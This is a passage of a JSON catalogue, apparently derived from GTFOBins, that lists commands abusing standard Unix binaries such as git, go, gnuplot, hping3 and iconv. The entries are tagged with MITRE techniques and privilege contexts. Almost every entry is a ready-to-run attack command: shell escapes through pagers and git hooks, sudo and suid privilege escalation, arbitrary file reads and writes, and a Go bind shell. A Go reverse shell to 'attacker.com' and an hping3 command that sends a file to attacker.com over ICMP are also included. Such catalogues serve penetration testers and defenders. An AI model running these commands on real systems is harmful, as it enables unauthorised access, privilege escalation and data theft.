Write"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:0:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:1:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:suid","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:gnuplot:shell:0:sudo","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:gnuplot:shell:0:suid","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:gnuplot:shell:0:unprivileged","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:go:bind-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:bind-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-read:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-read:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-write:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-write:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:reverse-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:reverse-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:grc:shell:0:sudo","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grc/"]},{"id":"gtfo:grc:shell:0:unprivileged","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grc/"]},{"id":"gtfo:grep:file-read:0:sudo","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:grep:file-read:0:suid","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:grep:file-read:0:unprivileged","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:gtester:file-write:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:file-write:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:file-write:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh -p' >/path/to/temp-file\necho 'exec /bin/sh -p 0<&1' >>/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:guile:shell:0:sudo","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:guile:shell:0:suid","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:guile:shell:0:unprivileged","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:gzip:file-read:0:capabilities","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:sudo","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:suid","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:unprivileged","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:hashcat:file-write:0:sudo","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hashcat/"]},{"id":"gtfo:hashcat:file-write:0:unprivileged","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hashcat/"]},{"id":"gtfo:head:file-read:0:sudo","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:head:file-read:0:suid","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:head:file-read:0:unprivileged","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:hexdump:file-read:0:sudo","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hexdump:file-read:0:suid","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hexdump:file-read:0:unprivileged","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hg:shell:0:sudo","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:hg:shell:0:suid","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:hg:shell:0:unprivileged","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:highlight:file-read:0:sudo","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:highlight:file-read:0:suid","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:highlight:file-read:0:unprivileged","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:hping3:shell:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:shell:0:suid","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:shell:0:unprivileged","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:upload:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"hping3 attacker.com --icmp --data 999 --sign xxx --file /path/to/input-file","description":"The file is continuously sent as ICMP packets (e.g., of `999` bytes), the optional `--end` parameter signals when the file reached the end.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:iconv:file-read:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-read:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-read:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iftop:shell:0:sudo","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:iftop:shell:0:suid","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:iftop:shell:0:unprivileged","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires 